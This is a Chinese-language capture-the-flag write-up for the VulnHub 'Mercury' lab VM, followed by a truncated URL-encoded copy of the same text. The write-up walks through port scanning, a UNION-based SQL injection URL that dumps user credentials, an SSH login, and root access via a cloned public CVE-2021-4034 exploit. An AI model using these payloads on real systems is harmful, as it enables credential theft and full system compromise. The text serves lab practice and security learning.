vulnhub靶场——THE PLANETS: MERCURY

THE PLANETS:MECURY

准备

攻击机： kali

靶机: THE PLANETS:MECURY NAT 192.168.91.0 网段

下载连接:

https://www.vulnhub.com/entry/the-planets-mercury,544/

测试发现无法正常获取IP，因此进入拯救模式修改网卡配置文件。

开启长按 shift 显示如下画面:

在当前画面按 e 

如图所示，将 ro quiet 跟改为 ： rw signie init=/bin/bash

然后按 ctrl + x 进入系统进入系统，输入: lsb_release -a 系统发行版本

如图所示为 Ununtu 20.0.4, 众所周知，Ubunut 新版本中修改IP地址配置文件为 /etc/netplan/*** （*** 根据实际情况文件名称是什么就是什么）先查看网卡名称

为 ens33,现在修改配置文件
vi /etc/netplan/00-installer-config.yaml

如图所示将 原本错误的网卡名称跟改为 ens33, 这里已经修改完成。现在只需重启linux 正常启动即可。

信息搜集与利用

主机发现

如图所示得到了目标靶机的IP地址： 192.168.91.172

端口扫描

nmap -sV -p- -A -sS 192.168.91.172 -oN nmap_mercury.txt

Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-09 17:05 CST
Nmap scan report for 192.168.91.172
Host is up (0.00092s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA)
|   256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA)
|_  256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519)
8080/tcp open  http-proxy WSGIServer/0.2 CPython/3.8.2
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     Date: Wed, 09 Feb 2022 09:04:57 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html
|     X-Frame-Options: DENY
|     Content-Length: 2366
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta http-equiv="content-type" content="text/html; charset=utf-8">
|     <title>Page not found at /nice ports,/Trinity.txt.bak</title>
|     <meta name="robots" content="NONE,NOARCHIVE">
|     <style type="text/css">
|     html * { padding:0; margin:0; }
|     body * { padding:10px 20px; }
|     body * * { padding:0; }
|     body { font:small sans-serif; background:#eee; color:#000; }
|     body>div { border-bottom:1px solid #ddd; }
|     font-weight:normal; margin-bottom:.4em; }
|     span { font-size:60%; color:#666; font-weight:normal; }
|     table { border:none; border-collapse: collapse; width:100%; }
|     vertical-align:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Wed, 09 Feb 2022 09:04:57 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html; charset=utf-8
|     X-Frame-Options: DENY
|     Content-Length: 69
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     Hello. This site is currently in development please check back later.
|   RTSPRequest:
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

仔细查看扫描结果，只开放了 22,8080两个端口，其中 8080 为 python 3.8构成的页面。

HTTP

http://192.168.91.172:8080/

尝试是否开启了 DEBUG,随便构造一个错误的url即可

如图所示可以断定为 Django 开发的网页，存在的 路由有: robots.txt ,mercuryfacts/, 访问它们，同时扫一下目录

目录扫描

dirb http://192.168.91.172:8080/

默认只能扫描出 robots.txt 然而 robots.txt协议什么都没有

访问：

http://192.168.91.172:8080/mercuryfacts/


如图所示显示出了 水星？

进入 Load a fact 页面显示如下

http://192.168.91.172:8080/mercuryfacts/1/

如图所示，注意数字1，经过测试1-8可以显示内容，猜测存在sql注入，验证：

http://192.168.91.172:8080/mercuryfacts/1'/

如上报错，则证明sql 注入存在。经过测试得到如下内容:

http://192.168.91.172:8080/mercuryfacts/44%20union%20select%20group\_concat(username,0x2d,password)%20from%20users/

得到了几个用户名和密码。那么尝试能否 ssh 登陆。

经测试发现最后一个用户 webmaster-mercuryisthesizeof0.056Earths ssh 登陆成功

信息搜集

如图所示：在当前目录下存在第一个flag

cat /etc/passwd | grep “/bin.bash”


如图所示：除了 root 用户外，另有三个用户具有 /bin/bash 分别是: mercury,webmaster(当前登陆用户),linuxmaster。

flag 1

[user_flag_8339915c9a454657bd60ee58776f4ccd]

根据老套路，最后一个 flag 一般在 root 目录下，因此需要提权

在 mercury_proj/notes.txt 有如下内容

如图所示很明显：linuxmaster 为之后要切换的用户，其密码为 base64编码 bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg== 将其解码得到:
mercurymeandiameteris4880km

因此得到用户名和密码: linuxmaster:mercurymeandiameteris4880km

切换用户到 linuxmaster

如图所示切换成功。

SUID提取

find / -perm -u=s -type f 2>/dev/null

经过搜索发现 最后一个即红框中的内容存在提权漏洞，而且是去年才曝光的漏洞：
CVE-2021-4034
git clone https://github.com/berdav/CVE-2021-4034


进入 CVE-2021-4034 文件夹然后执行 make 命令

将生成 cve-2021-4034 可执行文件，直接运行即可

./cve-2021-4034

如图所示成功提权，拿到 root 权限，现在找root 目录下的 flag即可

如图所示拿到了 flag, 这个系列靶机挺有意思的。

总结:

1. sql 注入
2. cve-2021-4034

%23%23%20%E5%87%86%E5%A4%87%0A%E6%94%BB%E5%87%BB%E6%9C%BA%EF%BC%9A%20kali%0A%E9%9D%B6%E6%9C%BA%3A%C2%A0THE%20PLANETS%3AMECURY%20NAT%20192.168.91.0%20%E7%BD%91%E6%AE%B5%0A%E4%B8%8B%E8%BD%BD%E8%BF%9E%E6%8E%A5%3A%0Ahttps%3A%2F%2Fwww.vulnhub.com%2Fentry%2Fthe-planets-mercury%2C544%2F%0A%0A%E6%B5%8B%E8%AF%95%E5%8F%91%E7%8E%B0%E6%97%A0%E6%B3%95%E6%AD%A3%E5%B8%B8%E8%8E%B7%E5%8F%96IP%EF%BC%8C%E5%9B%A0%E6%AD%A4%E8%BF%9B%E5%85%A5%E6%8B%AF%E6%95%91%E6%A8%A1%E5%BC%8F%E4%BF%AE%E6%94%B9%E7%BD%91%E5%8D%A1%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E3%80%82%0A%E5%BC%80%E5%90%AF%E9%95%BF%E6%8C%89%20shift%20%E6%98%BE%E7%A4%BA%E5%A6%82%E4%B8%8B%E7%94%BB%E9%9D%A2%3A%0A!%5B3fa466c50a572ecce09946e3cc4f1767.png%5D(en-resource%3A%2F%2Fdatabase%2F4251%3A1)%0A%0A%E5%9C%A8%E5%BD%93%E5%89%8D%E7%94%BB%E9%9D%A2%E6%8C%89%20e%C2%A0%0A!%5B8366aea33aab02bfea65a1646aacbf1c.png%5D(en-resource%3A%2F%2Fdatabase%2F4253%3A1)%0A%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%EF%BC%8C%E5%B0%86%20ro%20quiet%20%E8%B7%9F%E6%94%B9%E4%B8%BA%20%EF%BC%9A%20rw%20signie%20init%3D%2Fbin%2Fbash%0A%0A!%5B2a317082b76c73e1ee59e713f5fae030.png%5D(en-resource%3A%2F%2Fdatabase%2F4303%3A1)%0A%0A%0A%E7%84%B6%E5%90%8E%E6%8C%89%20ctrl%20%2B%20x%20%E8%BF%9B%E5%85%A5%E7%B3%BB%E7%BB%9F%E8%BF%9B%E5%85%A5%E7%B3%BB%E7%BB%9F%EF%BC%8C%E8%BE%93%E5%85%A5%3A%20lsb_release%20-a%20%E7%B3%BB%E7%BB%9F%E5%8F%91%E8%A1%8C%E7%89%88%E6%9C%AC%0A%0A!%5B38d6d747152623ce66c1750816b37795.png%5D(en-resource%3A%2F%2Fdatabase%2F4305%3A1)%0A%0A%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E4%B8%BA%20Ununtu%2020.0.4%2C%20%E4%BC%97%E6%89%80%E5%91%A8%E7%9F%A5%EF%BC%8CUbunut%20%E6%96%B0%E7%89%88%E6%9C%AC%E4%B8%AD%E4%BF%AE%E6%94%B9IP%E5%9C%B0%E5%9D%80%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E4%B8%BA%20%2Fetc%2Fnetplan%2F***%20%EF%BC%88***%20%E6%A0%B9%E6%8D%AE%E5%AE%9E%E9%99%85%E6%83%85%E5%86%B5%E6%96%87%E4%BB%B6%E5%90%8D%E7%A7%B0%E6%98%AF%E4%BB%80%E4%B9%88%E5%B0%B1%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%89%E5%85%88%E6%9F%A5%E7%9C%8B%E7%BD%91%E5%8D%A1%E5%90%8D%E7%A7%B0%0A%0A!%5Bfac03bd556e540353baa0eb83fbb8e05.png%5D(en-resource%3A%2F%2Fdatabase%2F4307%3A1)%0A%0A%0A%E4%B8%BA%20ens33%2C%E7%8E%B0%E5%9C%A8%E4%BF%AE%E6%94%B9%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%0A**vi%20%2Fetc%2Fnetplan%2F00-installer-config.yaml**%0A%0A!%5B30e42a2ab275fbe6c25b40c6a3984131.png%5D(en-resource%3A%2F%2Fdatabase%2F4309%3A1)%0A%0A%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E5%B0%86%20%E5%8E%9F%E6%9C%AC%E9%94%99%E8%AF%AF%E7%9A%84%E7%BD%91%E5%8D%A1%E5%90%8D%E7%A7%B0%E8%B7%9F%E6%94%B9%E4%B8%BA%20ens33%2C%20%E8%BF%99%E9%87%8C%E5%B7%B2%E7%BB%8F%E4%BF%AE%E6%94%B9%E5%AE%8C%E6%88%90%E3%80%82%E7%8E%B0%E5%9C%A8%E5%8F%AA%E9%9C%80%E9%87%8D%E5%90%AFlinux%20%E6%AD%A3%E5%B8%B8%E5%90%AF%E5%8A%A8%E5%8D%B3%E5%8F%AF%E3%80%82%0A!%5B60e002c7e66d3bc0da50dcdce3d73dc1.png%5D(en-resource%3A%2F%2Fdatabase%2F4311%3A0)%0A%0A%0A%23%23%20%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86%E4%B8%8E%E5%88%A9%E7%94%A8%0A%23%23%23%20%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0%0A!%5Bcbfd7cc466b2fd95aa8ee7e750eb6536.png%5D(en-resource%3A%2F%2Fdatabase%2F4313%3A0)%0A%0A%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E5%BE%97%E5%88%B0%E4%BA%86%E7%9B%AE%E6%A0%87%E9%9D%B6%E6%9C%BA%E7%9A%84IP%E5%9C%B0%E5%9D%80%EF%BC%9A%20192.168.91.172%0A%0A%23%23%23%20%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F%0A**nmap%20-sV%20-p-%20-A%20-sS%20192.168.91.172%20-oN%20nmap_mercury.txt**%0A%0A%60%60%60%0AStarting%20Nmap%207.92%20(%20https%3A%2F%2Fnmap.org%20)%20at%202022-02-09%2017%3A05%20CST%0ANmap%20scan%20report%20for%20192.168.91.172%0AHost%20is%20up%20(0.00092s%20latency).%0ANot%20shown%3A%2065533%20closed%20tcp%20ports%20(reset)%0APORT%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0STATE%20SERVICE%C2%A0%C2%A0%C2%A0%C2%A0VERSION%0A22%2Ftcp%C2%A0%C2%A0%C2%A0open%C2%A0%C2%A0ssh%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0OpenSSH%208.2p1%20Ubuntu%204ubuntu0.1%20(Ubuntu%20Linux%3B%20protocol%202.0)%0A%7C%20ssh-hostkey%3A%0A%7C%C2%A0%C2%A0%C2%A03072%20c8%3A24%3Aea%3A2a%3A2b%3Af1%3A3c%3Afa%3A16%3A94%3A65%3Abd%3Ac7%3A9b%3A6c%3A29%20(RSA)%0A%7C%C2%A0%C2%A0%C2%A0256%20e8%3A08%3Aa1%3A8e%3A7d%3A5a%3Abc%3A5c%3A66%3A16%3A48%3A24%3A57%3A0d%3Afa%3Ab8%20(ECDSA)%0A%7C_%C2%A0%C2%A0256%202f%3A18%3A7e%3A10%3A54%3Af7%3Ab9%3A17%3Aa2%3A11%3A1d%3A8f%3Ab3%3A30%3Aa5%3A2a%20(ED25519)%0A8080%2Ftcp%20open%C2%A0%C2%A0http-proxy%20WSGIServer%2F0.2%20CPython%2F3.8.2%0A%7C%20fingerprint-strings%3A%0A%7C%C2%A0%C2%A0%C2%A0FourOhFourRequest%3A%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0HTTP%2F1.1%20404%20Not%20Found%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0Date%3A%20Wed%2C%2009%20Feb%202022%2009%3A04%3A57%20GMT%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0Server%3A%20WSGIServer%2F0.2%20CPython%2F3.8.2%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0Content-Type%3A%20text%2Fhtml%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0X-Frame-Options%3A%20DENY%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0Content-Length%3A%202366%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0X-Content-Type-Options%3A%20nosniff%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0Referrer-Policy%3A%20same-origin%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3C!DOCTYPE%20html%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Chtml%20lang%3D%22en%22%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Chead%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Ctitle%3EPage%20not%20found%20at%20%2Fnice%20ports%2C%2FTrinity.txt.bak%3C%2Ftitle%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Cmeta%20name%3D%22robots%22%20content%3D%22NONE%2CNOARCHIVE%22%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Cstyle%20type%3D%22text%2Fcss%22%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0html%20*%20%7B%20padding%3A0%3B%20margin%3A0%3B%20%7D%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0body%20*%20%7B%20padding%3A10px%2020px%3B%20%7D%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0body%20*%20*%20%7B%20padding%3A0%3B%20%7D%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0body%20%7B%20font%3Asmall%20sans-serif%3B%20background%3A%23eee%3B%20color%3A%23000%3B%20%7D%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0body%3Ediv%20%7B%20border-bottom%3A1px%20solid%20%23ddd%3B%20%7D%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0font-weight%3Anormal%3B%20margin-bottom%3A.4em%3B%20%7D%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0span%20%7B%20font-size%3A60%25%3B%20color%3A%23666%3B%20font-weight%3Anormal%3B%20%7D%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0table%20%7B%20border%3Anone%3B%20border-collapse%3A%20collapse%3B%20width%3A100%25%3B%20%7D%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0vertical-align%3A%0A%7C%C2%A0%C2%A0%C2%A0GetRequest%2C%20HTTPOptions%3A%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0HTTP%2F1.1%20200%20OK%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0Date%3A%20Wed%2C%2009%20Feb%202022%2009%3A04%3A57%20GMT%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0Server%3A%20WSGIServer%2F0.2%20CPython%2F3.8.2%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0Content-Type%3A%20text%2Fhtml%3B%20charset%3Dutf-8%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0X-Frame-Options%3A%20DENY%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0Content-Length%3A%2069%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0X-Content-Type-Options%3A%20nosniff%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0Referrer-Policy%3A%20same-origin%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0Hello.%20This%20site%20is%20currently%20in%20development%20please%20check%20back%20later.%0A%7C%C2%A0%C2%A0%C2%A0RTSPRequest%3A%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3C!DOCTYPE%20HTML%20PUBLIC%20%22-%2F%2FW3C%2F%2FDTD%20HTML%204.01%2F%2FEN%22%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%22http%3A%2F%2Fwww.w3.org%2FTR%2Fhtml4%2Fstrict.dtd%22%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Chtml%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Chead%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3Bcharset%3Dutf-8%22%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Ctitle%3EError%20response%3C%2Ftitle%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3C%2Fhead%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Cbody%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Ch1%3EError%20response%3C%2Fh1%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Cp%3EError%20code%3A%20400%3C%2Fp%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Cp%3EMessage%3A%20Bad%20request%20version%20('RTSP%2F1.0').%3C%2Fp%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3Cp%3EError%20code%20explanation%3A%20HTTPStatus.BAD_REQUEST%20-%20Bad%20request%20syntax%20or%20unsupported%20method.%3C%2Fp%3E%0A%7C%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%3C%2Fbody%3E%0A%7C_%C2%A0%C2%A0%C2%A0%C2%A0%3C%2Fhtml%3E%0A%7C%20http-robots.txt%3A%201%20disallowed%20entry%0A%7C_%2F%0A%7C_http-title%3A%20Site%20doesn't%20have%20a%20title%20(text%2Fhtml%3B%20charset%3Dutf-8).%0A%7C_http-server-header%3A%20WSGIServer%2F0.2%20CPython%2F3.8.2%0A1%20service%20unrecognized%20despite%20returning%20data.%20If%20you%20know%20the%20service%2Fversion%2C%20please%20submit%20the%20following%20fingerprint%20at%20https%3A%2F%2Fnmap.org%2Fcgi-bin%2Fsubmit.cgi%3Fnew-service%20%3A%0A%0A%60%60%60%0A%0A%E4%BB%94%E7%BB%86%E6%9F%A5%E7%9C%8B%E6%89%AB%E6%8F%8F%E7%BB%93%E6%9E%9C%EF%BC%8C%E5%8F%AA%E5%BC%80%E6%94%BE%E4%BA%86%2022%2C8080%E4%B8%A4%E4%B8%AA%E7%AB%AF%E5%8F%A3%EF%BC%8C%E5%85%B6%E4%B8%AD%208080%20%E4%B8%BA%20python%203.8%E6%9E%84%E6%88%90%E7%9A%84%E9%A1%B5%E9%9D%A2%E3%80%82%0A%0A%23%23%23%20HTTP%0Ahttp%3A%2F%2F192.168.91.172%3A8080%2F%0A!%5Bdf0000045b02c96a4ecde830fc7df309.png%5D(en-resource%3A%2F%2Fdatabase%2F4269%3A1)%0A%0A%E5%B0%9D%E8%AF%95%E6%98%AF%E5%90%A6%E5%BC%80%E5%90%AF%E4%BA%86%20DEBUG%2C%E9%9A%8F%E4%BE%BF%E6%9E%84%E9%80%A0%E4%B8%80%E4%B8%AA%E9%94%99%E8%AF%AF%E7%9A%84url%E5%8D%B3%E5%8F%AF%0A!%5B5bddde628ddbe029e5c781ef560ad5a8.png%5D(en-resource%3A%2F%2Fdatabase%2F4271%3A1)%0A%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E5%8F%AF%E4%BB%A5%E6%96%AD%E5%AE%9A%E4%B8%BA%20Django%20%E5%BC%80%E5%8F%91%E7%9A%84%E7%BD%91%E9%A1%B5%EF%BC%8C%E5%AD%98%E5%9C%A8%E7%9A%84%20%E8%B7%AF%E7%94%B1%E6%9C%89%3A%20robots.txt%20%2Cmercuryfacts%2F%2C%20%E8%AE%BF%E9%97%AE%E5%AE%83%E4%BB%AC%EF%BC%8C%E5%90%8C%E6%97%B6%E6%89%AB%E4%B8%80%E4%B8%8B%E7%9B%AE%E5%BD%95%0A%0A%23%23%23%20%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%0A%0A%20dirb%20http%3A%2F%2F192.168.91.172%3A8080%2F%0A%20%E9%BB%98%E8%AE%A4%E5%8F%AA%E8%83%BD%E6%89%AB%E6%8F%8F%E5%87%BA%20robots.txt%20%E7%84%B6%E8%80%8C%20robots.txt%E5%8D%8F%E8%AE%AE%E4%BB%80%E4%B9%88%E9%83%BD%E6%B2%A1%E6%9C%89%0A%0A%0A%0A%E8%AE%BF%E9%97%AE%EF%BC%9A%0Ahttp%3A%2F%2F192.168.91.172%3A8080%2Fmercuryfacts%2F%0A!%5Bfededaa776f92c551ae39bb8a3f6dd21.png%5D(en-resource%3A%2F%2Fdatabase%2F4273%3A1)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E6%98%BE%E7%A4%BA%E5%87%BA%E4%BA%86%20%E6%B0%B4%E6%98%9F%EF%BC%9F%0A%0A%E8%BF%9B%E5%85%A5%20Load%20a%20fact%20%E9%A1%B5%E9%9D%A2%E6%98%BE%E7%A4%BA%E5%A6%82%E4%B8%8B%0Ahttp%3A%2F%2F192.168.91.172%3A8080%2Fmercuryfacts%2F1%2F%0A!%5Bf344a43b90d34380dfc04c3a70f44073.png%5D(en-resource%3A%2F%2Fdatabase%2F4275%3A1)%0A%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%EF%BC%8C%E6%B3%A8%E6%84%8F%E6%95%B0%E5%AD%971%EF%BC%8C%E7%BB%8F%E8%BF%87%E6%B5%8B%E8%AF%951-8%E5%8F%AF%E4%BB%A5%E6%98%BE%E7%A4%BA%E5%86%85%E5%AE%B9%EF%BC%8C%E7%8C%9C%E6%B5%8B%E5%AD%98%E5%9C%A8sql%E6%B3%A8%E5%85%A5%EF%BC%8C%E9%AA%8C%E8%AF%81%EF%BC%9A%0A%0Ahttp%3A%2F%2F192.168.91.172%3A8080%2Fmercuryfacts%2F1'%2F%0A!%5B01e1b3d7f511b1edca545766224b9dd3.png%5D(en-resource%3A%2F%2Fdatabase%2F4277%3A1)%0A%0A%E5%A6%82%E4%B8%8A%E6%8A%A5%E9%94%99%EF%BC%8C%E5%88%99%E8%AF%81%E6%98%8Esql%20%E6%B3%A8%E5%85%A5%E5%AD%98%E5%9C%A8%E3%80%82%E7%BB%8F%E8%BF%87%E6%B5%8B%E8%AF%95%E5%BE%97%E5%88%B0%E5%A6%82%E4%B8%8B%E5%86%85%E5%AE%B9%3A%0Ahttp%3A%2F%2F192.168.91.172%3A8080%2Fmercuryfacts%2F44%2520union%2520select%2520group_concat(username%2C0x2d%2Cpassword)%2520from%2520users%2F%0A%0A!%5Bfc83f77df89ee7496e761b23bfe4bcdc.png%5D(en-resource%3A%2F%2Fdatabase%2F4279%3A1)%0A%0A%E5%BE%97%E5%88%B0%E4%BA%86%E5%87%A0%E4%B8%AA%E7%94%A8%E6%88%B7%E5%90%8D%E5%92%8C%E5%AF%86%E7%A0%81%E3%80%82%E9%82%A3%E4%B9%88%E5%B0%9D%E8%AF%95%E8%83%BD%E5%90%A6%20ssh%20%E7%99%BB%E9%99%86%E3%80%82%0A%0A%E7%BB%8F%E6%B5%8B%E8%AF%95%E5%8F%91%E7%8E%B0%E6%9C%80%E5%90%8E%E4%B8%80%E4%B8%AA%E7%94%A8%E6%88%B7%20**webmaster-mercuryisthesizeof0.056Earths**%20ssh%20%E7%99%BB%E9%99%86%E6%88%90%E5%8A%9F%0A!%5B2bc9bd12ccd416c92a0730c1c8bb1194.png%5D(en-resource%3A%2F%2Fdatabase%2F4281%3A1)%0A%0A%23%23%23%20%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86%0A%0A!%5B4fce88fe06fe858b7847ba02130739f1.png%5D(en-resource%3A%2F%2Fdatabase%2F4283%3A1)%0A%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%EF%BC%9A%E5%9C%A8%E5%BD%93%E5%89%8D%E7%9B%AE%E5%BD%95%E4%B8%8B%E5%AD%98%E5%9C%A8%E7%AC%AC%E4%B8%80%E4%B8%AAflag%0A%0A**cat%20%2Fetc%2Fpasswd%20%7C%20grep%20%22%2Fbin.bash%22**%0A!%5Bb5915d0dd0c9507b168bc1a44e3a6a0d.png%5D(en-resource%3A%2F%2Fdatabase%2F4287%3A1)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%EF%BC%9A%E9%99%A4%E4%BA%86%20root%20%E7%94%A8%E6%88%B7%E5%A4%96%EF%BC%8C%E5%8F%A6%E6%9C%89%E4%B8%89%E4%B8%AA%E7%94%A8%E6%88%B7%E5%85%B7%E6%9C%89%20%2Fbin%2Fbash%20%E5%88%86%E5%88%AB%E6%98%AF%3A%20mercury%2Cwebmaster(%E5%BD%93%E5%89%8D%E7%99%BB%E9%99%86%E7%94%A8%E6%88%B7)%2Clinuxmaster%E3%80%82%0A%0A%0A%23%23%23%20flag%201%0A%0A!%5B2557f0814b2c35a4d2a89742b245accf.png%5D(en-resource%3A%2F%2Fdatabase%2F4285%3A1)%0A%5Buser_flag_8339915c9a454657bd60ee58776f4ccd%5D%0A%0A%E6%A0%B9%E6%8D%AE%E8%80%81%E5%A5%97%E8%B7%AF%EF%BC%8C%E6%9C%80%E5%90%8E%E4%B8%80%E4%B8%AA%20flag%20%E4%B8%80%E8%88%AC%E5%9C%A8%20root%20%E7%9B%AE%E5%BD%95%E4%B8%8B%EF%BC%8C%E5%9B%A0%E6%AD%A4%E9%9C%80%E8%A6%81%E6%8F%90%E5%8F%96%0A%0A%E5%9C%A8%20mercury_proj%2Fnotes.txt%20%E6%9C%89%E5%A6%82%E4%B8%8B%E5%86%85%E5%AE%B9%0A!%5B32771e74384609c7d7f1bf596ea6ef93.png%5D(en-resource%3A%2F%2Fdatabase%2F4289%3A1)%0A%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E5%BE%88%E6%98%8E%E6%98%BE%EF%BC%9Alinuxmaster%20%E4%B8%BA%E4%B9%8B%E5%90%8E%E8%A6%81%E5%88%87%E6%8D%A2%E7%9A%84%E7%94%A8%E6%88%B7%EF%BC%8C%E5%85%B6%E5%AF%86%E7%A0%81%E4%B8%BA%20base64%E7%BC%96%E7%A0%81%20bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg%3D%3D%20%E5%B0%86%E5%85%B6%E8%A7%A3%E7%A0%81%E5%BE%97%E5%88%B0%3A%0A**mercurymeandiameteris4880km**%0A%E5%9B%A0%E6%AD%A4%E5%BE%97%E5%88%B0%E7%94%A8%E6%88%B7%E5%90%8D%E5%92%8C%E5%AF%86%E7%A0%81%3A%20linuxmaster%3Amercurymeandiameteris4880km%0A%0A%E5%88%87%E6%8D%A2%E7%94%A8%E6%88%B7%E5%88%B0%20linuxmaster%0A%0A!%5B0dc2605b0c96e681dfd9adc14e47ff39.png%5D(en-resource%3A%2F%2Fdatabase%2F4291%3A1)%0A%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E5%88%87%E6%8D%A2%E6%88%90%E5%8A%9F%E3%80%82%0A%0ASUID%E6%8F%90%E5%8F%96%0A**find%20%2F%20-perm%20-u%3Ds%20-type%20f%202%3E%2Fdev%2Fnull**%0A!%5Bde63730dd19ea235f27b82ef426d3850.png%5D(en-resource%3A%2F%2Fdatabase%2F4293%3A1)%0A%0A%E7%BB%8F%E8%BF%87%E6%90%9C%E7%B4%A2%E5%8F%91%E7%8E%B0%20%E6%9C%80%E5%90%8E%E4%B8%80%E4%B8%AA%E5%8D%B3%E7%BA%A2%E6%A1%86%E4%B8%AD%E7%9A%84%E5%86%85%E5%AE%B9%E5%AD%98%E5%9C%A8%E6%8F%90%E6%9D%83%E6%BC%8F